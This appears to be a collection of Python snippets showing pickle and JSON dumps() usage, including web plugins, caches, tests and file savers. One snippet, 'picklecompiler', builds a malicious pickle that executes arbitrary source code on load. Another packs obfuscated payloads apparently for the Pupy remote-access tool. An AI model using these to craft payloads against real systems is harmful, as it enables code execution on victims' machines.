def apply(self, callback, route):
    """Bottle plugin hook: wrap *callback* so dict results become JSON."""
    dumps = self.json_dumps
    if not dumps:
        # JSON support disabled -> leave the route handler untouched.
        return callback

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPResponse as resp:
            # Treat a raised response like a returned one.
            rv = resp

        if isinstance(rv, dict):
            # Serialize first (this may raise); only claim the JSON
            # content type once serialization has succeeded.
            encoded = dumps(rv)
            response.content_type = 'application/json'
            return encoded
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
# Python dumps() usage examples (collected snippets)
def memoized(func):
    """Decorator that caches a function's return value each time it is called.
    If called later with the same arguments, the cached value is returned, and
    the function is not re-evaluated.
    Based upon from http://wiki.python.org/moin/PythonDecoratorLibrary#Memoize
    Nota bene: this decorator memoizes /all/ calls to the function.
    For a memoization decorator with limited cache size, consider:
    http://code.activestate.com/recipes/496879-memoize-decorator-function-with-cache-size-limit/

    Arguments must be picklable; unpicklable arguments raise at call time.
    """
    cache = {}
    @wraps(func)
    def func_wrapper(*args, **kwargs):
        # Sort kwargs so the pickled key is independent of keyword order:
        # f(a=1, b=2) and f(b=2, a=1) must hit the same cache entry.
        key = cPickle.dumps((args, sorted(kwargs.items())))
        if key not in cache:
            cache[key] = func(*args, **kwargs)
        return cache[key]
    return func_wrapper
def _testStruct(self, Struct, values = {}, delattrs = ()):
    """Round-trip *Struct* through pack/unpack with a pickled schema.

    Builds an instance, removes *delattrs* and applies *values*, packs it,
    pickles/unpickles the schema (protocol 2), and verifies the unpacked
    copy matches attribute-for-attribute.

    NOTE(review): Python 2 code (iteritems, assertEquals). The mutable
    default ``values={}`` is shared across calls but only read here.
    """
    schema = mapped_struct.Schema.from_typed_slots(Struct)
    x = Struct()
    for k in delattrs:
        delattr(x, k)
    for k,v in values.iteritems():
        setattr(x, k, v)
    px = schema.pack(x)
    old_schema = schema
    # The schema must survive a pickle round-trip and stay compatible
    # in both directions with the original.
    schema = cPickle.loads(cPickle.dumps(schema, 2))
    self.assertTrue(old_schema.compatible(schema))
    self.assertTrue(schema.compatible(old_schema))
    dx = schema.unpack(px)
    for k in Struct.__slots__:
        if k in values or k not in delattrs:
            self.assertEquals(getattr(dx, k, None), getattr(x, k, None))
        else:
            # Deleted-and-unset attributes must stay absent after unpack.
            self.assertFalse(hasattr(dx, k))
def testPackPickleUnpack(self):
    """Pack with the live schema, unpack with a pickled/unpickled copy.

    The subschema type code is unregistered up front (registering twice
    raises), re-registered for each value set, then unregistered again
    before unpickling so the schema must auto-register itself on load.
    """
    # hack - unregister subschema (can't register twice)
    mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None)
    mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None)
    for TEST_VALUES in self.TEST_VALUES:
        # re-register subschema
        mapped_struct.mapped_object.register_schema(self.SubStruct, self.subschema, '}')
        x = self.Struct(**{k:v for k,v in TEST_VALUES.iteritems()})
        pschema = cPickle.dumps(self.schema)
        # Unregister schema to force the need for auto-register
        mapped_struct.mapped_object.TYPE_CODES.pop(self.SubStruct,None)
        mapped_struct.mapped_object.OBJ_PACKERS.pop('}',None)
        pschema = cPickle.loads(pschema)
        dx = pschema.unpack(self.schema.pack(x))
        for k,v in TEST_VALUES.iteritems():
            self.assertTrue(hasattr(dx, k))
            self.assertEqual(getattr(dx, k), v)
        for k in self.Struct.__slots__:
            if k not in TEST_VALUES:
                # Attributes never set must stay absent after unpack.
                self.assertFalse(hasattr(dx, k))
def news():
    """Get news from different ATOM RSS feeds.

    Parses each configured feed; when the newest entry differs from the
    cached one, stores it in the sentinel sorted set and flags admins to
    be notified. Each URL owns a fixed score slot.
    """
    import feedparser
    from pybossa.core import sentinel
    from pybossa.news import get_news, notify_news_admins, FEED_KEY
    try:
        import cPickle as pickle
    except ImportError:  # pragma: no cover
        import pickle
    urls = ['https://github.com/pybossa/pybossa/releases.atom',
            'http://scifabric.com/blog/all.atom.xml']
    score = 0
    notify = False
    if current_app.config.get('NEWS_URL'):
        urls += current_app.config.get('NEWS_URL')
    for url in urls:
        d = feedparser.parse(url)
        # Guard against empty or unreachable feeds: d.entries may be [],
        # and d.entries[0] below would raise IndexError.
        if not d.entries:
            score += 1
            continue
        tmp = get_news(score)
        if (len(tmp) == 0) or (tmp[0]['updated'] != d.entries[0]['updated']):
            sentinel.master.zadd(FEED_KEY, float(score),
                                 pickle.dumps(d.entries[0]))
            notify = True
        # Score slot advances per-URL regardless of outcome.
        score += 1
    if notify:
        notify_news_admins()
def cache(key_prefix, timeout=300):
    """
    Decorator for caching functions.
    Returns the function value from cache, or the function if cache disabled
    """
    timeout = 300 if timeout is None else timeout

    def decorator(f):
        @wraps(f)
        def wrapper(*args, **kwargs):
            key = "%s::%s" % (settings.REDIS_KEYPREFIX, key_prefix)
            if os.environ.get('PYBOSSA_REDIS_CACHE_DISABLED') is None:
                cached = sentinel.slave.get(key)
                if cached:
                    return pickle.loads(cached)
            # Cache miss (or caching disabled): compute, write through,
            # and return the fresh value.
            result = f(*args, **kwargs)
            sentinel.master.setex(key, timeout, pickle.dumps(result))
            return result
        return wrapper
    return decorator
def distribute_encode(socks):
    """idiokit coroutine: pickle messages and distribute them over *socks*.

    Receives (to_all, msg) pairs. When to_all is true the frame is sent to
    every socket; otherwise it goes to a single currently-writable socket,
    reusing the writable set cached from a previous select() when possible.
    """
    writable = []
    while True:
        to_all, msg = yield idiokit.next()
        msg_bytes = cPickle.dumps(msg, cPickle.HIGHEST_PROTOCOL)
        # Frame format: 4-byte big-endian length prefix + pickle payload.
        data = struct.pack("!I", len(msg_bytes)) + msg_bytes
        if to_all:
            for sock in socks:
                yield sock.sendall(data)
            # A broadcast invalidates the cached writable set.
            writable = []
        else:
            # Block until at least one socket is writable, then send to
            # one of them (popped so load spreads across sockets).
            while not writable:
                _, writable, _ = yield select.select((), socks, ())
                writable = list(writable)
            yield writable.pop().sendall(data)
def save_weights(fname, params, metadata=None):
    """ assumes all params have unique names.

    Saves each param's value (and optionally pickled *metadata*) into a
    compressed .npz archive at *fname*.
    """
    # Includes batchnorm params now
    names = [par.name for par in params]
    if len(names) != len(set(names)):
        raise ValueError('need unique param names')
    # borrow=False copies values so later updates to the shared variables
    # cannot mutate what gets written.
    param_dict = { param.name : param.get_value(borrow=False)
                   for param in params }
    if metadata is not None:
        # NOTE(review): stored under the fixed key 'metadata' — a param
        # actually named 'metadata' would be clobbered here.
        param_dict['metadata'] = pickle.dumps(metadata)
    logging.info('saving {} parameters to {}'.format(len(params), fname))
    # try to avoid half-written files
    # NOTE(review): Path here appears to be path.py (stripext() is not a
    # pathlib method) — TODO confirm.
    fname = Path(fname)
    if fname.exists():
        # Overwrite path: write a sibling .tmp.npz, then rename over the
        # original so a crash never leaves a truncated file behind.
        tmp_fname = Path(fname.stripext() + '.tmp.npz') # TODO yes, this is a hack
        np.savez_compressed(str(tmp_fname), **param_dict)
        tmp_fname.rename(fname)
    else:
        # NOTE(review): first-time save writes directly, so it is NOT
        # protected against partial writes — confirm whether that matters.
        np.savez_compressed(str(fname), **param_dict)
def testNonIdentityHash(self):
    """Versioned upgrades must work for instances whose __hash__ collides.

    The class is made module-global so pickle can resolve it by name.
    """
    global ClassWithCustomHash
    class ClassWithCustomHash(styles.Versioned):
        def __init__(self, unique, hash):
            self.unique = unique
            self.hash = hash
        def __hash__(self):
            return self.hash
    # Two distinct instances sharing the same hash value (0).
    v1 = ClassWithCustomHash('v1', 0)
    v2 = ClassWithCustomHash('v2', 0)
    pkl = pickle.dumps((v1, v2))
    del v1, v2
    # Bump the version AFTER pickling so loading triggers an upgrade.
    ClassWithCustomHash.persistenceVersion = 1
    ClassWithCustomHash.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True)
    v1, v2 = pickle.loads(pkl)
    styles.doUpgrade()
    self.assertEquals(v1.unique, 'v1')
    self.assertEquals(v2.unique, 'v2')
    # Both objects must have been upgraded despite the hash collision.
    self.failUnless(v1.upgraded)
    self.failUnless(v2.upgraded)
def testUpgradeDeserializesObjectsRequiringUpgrade(self):
    """An upgrade hook that itself unpickles another Versioned object must
    leave that nested object upgraded too.

    Classes are made module-global so pickle can resolve them by name.
    """
    global ToyClassA, ToyClassB
    class ToyClassA(styles.Versioned):
        pass
    class ToyClassB(styles.Versioned):
        pass
    x = ToyClassA()
    y = ToyClassB()
    pklA, pklB = pickle.dumps(x), pickle.dumps(y)
    del x, y
    # Version bumps happen AFTER pickling so loading triggers upgrades.
    ToyClassA.persistenceVersion = 1
    def upgradeToVersion1(self):
        # Deserializing a ToyClassB during A's upgrade must schedule B's
        # own upgrade as well.
        self.y = pickle.loads(pklB)
        styles.doUpgrade()
    ToyClassA.upgradeToVersion1 = upgradeToVersion1
    ToyClassB.persistenceVersion = 1
    ToyClassB.upgradeToVersion1 = lambda self: setattr(self, 'upgraded', True)
    x = pickle.loads(pklA)
    styles.doUpgrade()
    self.failUnless(x.y.upgraded)
def makePickle(self, record):
    """
    Pickles the record in binary format with a length prefix, and
    returns it ready for transmission across the socket.
    """
    exc_info = record.exc_info
    if exc_info:
        # Render once so the traceback text lands in record.exc_text,
        # then drop exc_info itself: traceback objects do not pickle.
        self.format(record)
        record.exc_info = None
    # See issue #14436: If msg or args are objects, they may not be
    # available on the receiving end, so bake msg % args into a plain
    # string and zap the args.
    attrs = dict(record.__dict__)
    attrs['msg'] = record.getMessage()
    attrs['args'] = None
    payload = cPickle.dumps(attrs, 1)
    if exc_info:
        # Restore for any handler that runs after this one.
        record.exc_info = exc_info
    return struct.pack(">L", len(payload)) + payload
def picklecompiler(sourcefile):
    """
    Usually pickle can only be used to (de)serialize objects.
    This tiny snippet will allow you to transform arbitrary python source
    code into a pickle string. Unpickling this string with pickle.loads()
    will execute the given source code.
    The trick is actually pretty easy: Usually eval() will only accept
    expressions, thus class and function declarations do not work.
    Using the work-around of code objects (returned by compile()), we can
    execute real python source code :)

    SECURITY NOTE(review): this deliberately builds a malicious pickle
    that runs eval(compile(...)) on load. Never pickle.loads() untrusted
    data. (Python 2 code: print statement and the file() builtin.)
    """
    sourcecode = file(sourcefile).read()
    # [:-4] presumably strips the pickle trailer so the eval/compile
    # opcodes can be appended to form one combined payload — TODO confirm
    # against protocol-0 output.
    payload = "c__builtin__\neval\n(c__builtin__\ncompile\n(%sS'<payload>'\nS'exec'\ntRtR." % (pickle.dumps( sourcecode )[:-4],)
    print payload
    fp =open("poc.pickle","w")
    fp.write(payload)
def _update_list(self, name, data, func):
if not self.valid(name):
return
result = None
if self._is_iterable(data):
result = [self.dumps(i) for i in data]
else:
result = [self.dumps(data)]
if not result:
return
name = str(name)
try:
func(name, *result)
except Exception as e:
[func(name, i) for i in result]
def loads(strg):
    """
    Load a pickle from the given string.

    Parameters
    ----------
    strg : str
        The pickled string to load.

    Returns
    -------
    The reconstructed object, as returned by ``pickle.loads(strg)``.

    See Also
    --------
    dumps : Return a string corresponding to the pickling of a masked array.
    """
    return pickle.loads(strg)
def apply(self, callback, route):
    """Bottle plugin hook: render dict results from *callback* as JSON."""
    dumps = self.json_dumps
    if not dumps:
        # JSON rendering disabled: return the handler unwrapped.
        return callback

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPError:
            # Substitute the currently handled error as the result.
            rv = _e()
        if isinstance(rv, dict):
            # Serialize first (may raise); set the content type only
            # after serialization succeeded.
            encoded = dumps(rv)
            response.content_type = 'application/json'
            return encoded
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
def pack(self):
    """Build the obfuscated single-payload script for all scriptlets.

    Concatenates: the pupyimporter import, one pupy_add_package() call per
    dependency package (embedded as a pickled module dict), then each
    scriptlet's generated code.
    """
    fullpayload=[]
    fullpayload.append("import pupyimporter")
    all_packages=[]
    for sl in self.scriptlets:
        all_packages.extend(sl.dependencies)
    # Deduplicate dependencies shared between scriptlets.
    all_packages=list(set(all_packages))
    for p,n in all_packages:
        modules_dic=gen_package_pickled_dic(os.path.join(ROOT, p.replace("/",os.sep)), n)
        fullpayload.append("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(modules_dic)))
    for sl in self.scriptlets:
        if self.debug:
            fullpayload.append(sl.generate())
        else:
            # if not in debug mode, catch all exceptions so one failing
            # scriptlet cannot prevent the session from starting
            fullpayload.append(wrap_try_except(sl.generate()))
    return compress_encode_obfs('\n'.join(fullpayload))
def apply(self, callback, route):
    """Wrap *callback* so that dict return values are emitted as JSON."""
    dumps = self.json_dumps
    if not dumps:
        # No serializer configured — nothing to wrap.
        return callback

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPError:
            rv = _e()
        if isinstance(rv, dict):
            # dumps() may raise; only advertise JSON once it succeeded.
            body = dumps(rv)
            response.content_type = 'application/json'
            return body
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            # JSON-encode dict bodies of explicit HTTP responses too.
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
def flush(self):
    """
    Save storage contents to disk

    This method saves new and changed :class:`Storage` contents to disk
    and invalidates the Storage instance. Unchanged Storage is not saved
    but simply invalidated.
    """
    contents = pickle.dumps(self._storage)
    # Only hit the disk when the pickled contents actually changed.
    if self._hash is None or md5(contents).hexdigest() != self._hash:
        tmp = self._filename + '.tmp'
        try:
            with open(tmp, 'wb') as fo:
                fo.write(contents)
        except:
            # Clean up, but only if the temp file was actually created:
            # if open() itself failed, os.remove() would raise
            # FileNotFoundError and mask the original error.
            if os.path.exists(tmp):
                os.remove(tmp)
            raise
        move(tmp, self._filename)  # Atomic save
    # Invalidate the instance regardless of whether a save happened.
    del self._storage
def dump_stream(self, iterator, stream):
    """Write items from *iterator* to *stream* in adaptively sized,
    length-prefixed serialized batches.

    The batch size starts at 1, doubles while serialized batches stay
    under self.bestSize, and halves when a batch exceeds ten times it.
    """
    batch = 1
    best = self.bestSize
    iterator = iter(iterator)
    while True:
        chunk = list(itertools.islice(iterator, batch))
        if not chunk:
            break
        serialized = self.serializer.dumps(chunk)
        write_int(len(serialized), stream)
        stream.write(serialized)
        # Steer the batch size toward the target serialized size.
        size = len(serialized)
        if size < best:
            batch *= 2
        elif size > best * 10 and batch > 1:
            batch //= 2
def apply(self, callback, _):
    """Plugin hook: make *callback* serialize dict results to JSON."""
    dumps = self.json_dumps
    if not dumps:
        # Plugin inactive — pass the handler through unchanged.
        return callback

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPError:
            rv = _e()
        if isinstance(rv, dict):
            # Attempt serialization first; it may raise, in which case
            # the content type must remain untouched.
            json_body = dumps(rv)
            response.content_type = 'application/json'
            return json_body
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
def apply(self, callback, _):
    """Return *callback* wrapped so dict results become JSON responses."""
    dumps = self.json_dumps
    if not dumps:
        return callback  # serializer disabled: no wrapping needed

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPError:
            rv = _e()
        if isinstance(rv, dict):
            # Serialize before touching the response headers so a
            # serialization failure cannot mislabel the content type.
            rendered = dumps(rv)
            response.content_type = 'application/json'
            return rendered
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
def cache_it(self, key, f, time_expire):
    """Compute f() on a cache miss, store it in redis, and register the key
    in a per-minute expiry bucket so stale keys can be swept in bulk.

    NOTE(review): Python 2 code — ``expire_at / 60`` relies on integer
    division; under Python 3 the bucket names would become floats.
    """
    if self.debug:
        self.r_server.incr('web2py_cache_statistics:misses')
    cache_set_key = self.cache_set_key
    # Pad the bucket deadline by 2 minutes so the bucket outlives its keys.
    expire_at = int(time.time() + time_expire) + 120
    bucket_key = "%s:%s" % (cache_set_key, expire_at / 60)
    value = f()
    value_ = pickle.dumps(value, pickle.HIGHEST_PROTOCOL)
    # redis setex rejects a 0 TTL, so clamp to 1 second.
    if time_expire == 0:
        time_expire = 1
    # NOTE(review): this setex is repeated inside the pipeline below; the
    # first call looks redundant — confirm before removing.
    self.r_server.setex(key, time_expire, value_)
    # print '%s will expire on %s: it goes in bucket %s' % (key, time.ctime(expire_at))
    # print 'that will expire on %s' % (bucket_key, time.ctime(((expire_at / 60) + 1) * 60))
    p = self.r_server.pipeline()
    # add bucket to the fixed set
    p.sadd(cache_set_key, bucket_key)
    # sets the key
    p.setex(key, time_expire, value_)
    # add the key to the bucket
    p.sadd(bucket_key, key)
    # expire the bucket properly
    p.expireat(bucket_key, ((expire_at / 60) + 1) * 60)
    p.execute()
    return value
def test_text_dataset():
    """A TextDataset epoch iterator must be picklable mid-epoch and resume
    from the same position after a cPickle round-trip."""
    with temporary_content_path(TEST_TEXT) as path:
        dataset = TextDataset(path, 100)
        stream = dataset.get_example_stream()
        it = stream.get_epoch_iterator()
        d = next(it)
        assert d == (['abc', 'abc', 'def'],)
        # Snapshot the iterator state after the first example ...
        pickled_it = cPickle.dumps(it)
        d = next(it)
        assert d == (['def', 'def', 'xyz'],)
        # ... restoring it must replay from the snapshot point, repeating
        # the example consumed after the snapshot.
        it = cPickle.loads(pickled_it)
        d = next(it)
        assert d == (['def', 'def', 'xyz'],)
        d = next(it)
        assert d == (['xyz'],)
def new(self, c):
    """
    Insert a new creature in the DB, and set c.id accordingly
    """
    assert c.id is None
    # Insert an empty row first so sqlite assigns the ID ...
    self.cur.execute("INSERT INTO creatures(id) VALUES(NULL)")
    c.id = self.cur.lastrowid
    # ... then fill it in: the pickled blob thereby already contains
    # the creature's final id.
    pickled = pickle.dumps(c)
    self.cur.execute("""
            UPDATE creatures
            SET born_at = ?, pickled = ?
            WHERE id = ?
        """, (self.generation, pickled, c.id))
def save_track_proto_to_zip(track_proto, save_file):
zf = zipfile.ZipFile(save_file, 'w', allowZip64=True)
print "Writing to zip file {}...".format(save_file)
track_id = 0
for track in track_proto['tracks']:
track_obj = {}
for key in track[0]:
try:
track_obj[key] = np.asarray([box[key] for box in track])
except KeyError:
continue
zf.writestr('{:06d}.pkl'.format(track_id),
cPickle.dumps(track_obj, cPickle.HIGHEST_PROTOCOL))
track_id += 1
if (track_id + 1) % 1000 == 0:
print "\t{} tracks written.".format(track_id + 1)
print "\tTotally {} tracks written.".format(track_id + 1)
zf.close()
def apply(self, callback, route):
    """Plugin hook: JSON-encode dict results produced by *callback*."""
    dumps = self.json_dumps
    if not dumps:
        # Nothing to do without a serializer.
        return callback

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPError:
            rv = _e()
        if isinstance(rv, dict):
            # Serialization may raise; set the JSON content type only
            # once it has succeeded.
            payload = dumps(rv)
            response.content_type = 'application/json'
            return payload
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
def apply(self, callback, _):
    """Wrap the route handler so dict return values become JSON bodies."""
    dumps = self.json_dumps
    if not dumps:
        return callback  # JSON plugin disabled

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPError:
            rv = _e()
        if isinstance(rv, dict):
            # Encode first — on failure the exception propagates and the
            # content type is left alone.
            out = dumps(rv)
            response.content_type = 'application/json'
            return out
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
def apply(self, callback, _):
    """Plugin hook: JSON-serialize dict results and dict error bodies."""
    dumps = self.json_dumps
    if not dumps:
        # Serializer disabled — return the handler as-is.
        return callback

    def wrapper(*a, **ka):
        try:
            rv = callback(*a, **ka)
        except HTTPError as error:
            # Handle the error object itself as the result.
            rv = error
        if isinstance(rv, dict):
            # dumps() may raise; claim the JSON content type only after
            # successful serialization.
            body = dumps(rv)
            response.content_type = 'application/json'
            return body
        if isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
            rv.body = dumps(rv.body)
            rv.content_type = 'application/json'
        return rv

    return wrapper
def serialize(obj):
    """Return *obj* pickled with the highest available protocol."""
    return pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
def cookie_encode(data, key, digestmod=None):
    """Encode and sign a pickle-able object. Returns a (byte) string in
    the form ``!<base64 signature>?<base64 pickled payload>``."""
    depr(0, 13, "cookie_encode() will be removed soon.",
         "Do not use this API directly.")
    payload = base64.b64encode(pickle.dumps(data, -1))
    # HMAC over the encoded payload; sha256 unless a digest is supplied.
    digest = hmac.new(tob(key), payload,
                      digestmod=digestmod or hashlib.sha256).digest()
    return tob('!') + base64.b64encode(digest) + tob('?') + payload